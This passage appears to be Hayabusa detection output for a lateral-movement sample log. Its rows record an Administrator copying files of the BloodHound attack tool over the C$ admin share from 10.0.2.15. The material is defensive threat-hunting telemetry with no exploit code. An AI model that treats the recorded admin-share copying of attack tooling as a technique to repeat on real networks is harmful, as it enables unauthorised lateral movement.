Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.838 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.parsers.gexf : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.838 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.parsers.json : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.848 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.pathfinding.astar : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.848 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.plugins.activeState : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.848 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.plugins.animate : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.848 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.plugins.colorbrewer : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.848 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.plugins.design : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.848 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.plugins.dragNodes : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.858 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.plugins.edgeSiblings : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.858 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.plugins.filter : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.858 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.plugins.fullScreen : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.858 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.plugins.generators : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.858 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.plugins.keyboard : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.868 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.plugins.lasso : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.868 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.plugins.leaflet : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.868 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.plugins.legend : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.868 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.plugins.locate : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.878 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.plugins.neighborhoods : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.878 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.plugins.poweredBy : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.878 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.plugins.relativeSize : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.878 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.plugins.select : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.878 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.plugins.tooltips : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.888 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.renderers.customEdgeShapes : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.888 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.renderers.edgeLabels : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.888 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.renderers.glyphs : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.888 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.renderers.halo : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.898 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.renderers.linkurious : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.898 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.statistics.HITS : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.908 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.statistics.louvain : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.908 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\scripts : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.908 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\src : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.908 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\src\captors : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.918 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\src\classes : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.918 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\src\middlewares : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.918 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\src\misc : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.918 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\src\renderers : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.928 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\src\utils : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.928 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\listenercount : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.928 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\listenercount\test : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.928 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\locate-path : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.928 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\lodash : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.968 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\lodash\fp : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.978 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\loose-envify : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.988 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\make-dir : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.988 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\md5-file : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.988 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\minimatch : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.988 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\minimist : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.998 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\minimist\example : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.998 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\minimist\test : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.008 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\mkdirp : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.008 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\mkdirp\bin : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.008 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\mkdirp\examples : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.008 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\mkdirp\test : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.018 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\mustache : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.018 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\mustache\bin : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.018 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\mustache\wrappers : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.028 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\mustache\wrappers\dojo : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.028 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\mustache\wrappers\jquery : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.028 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\mustache\wrappers\mootools : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.028 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\mustache\wrappers\qooxdoo : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.038 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: 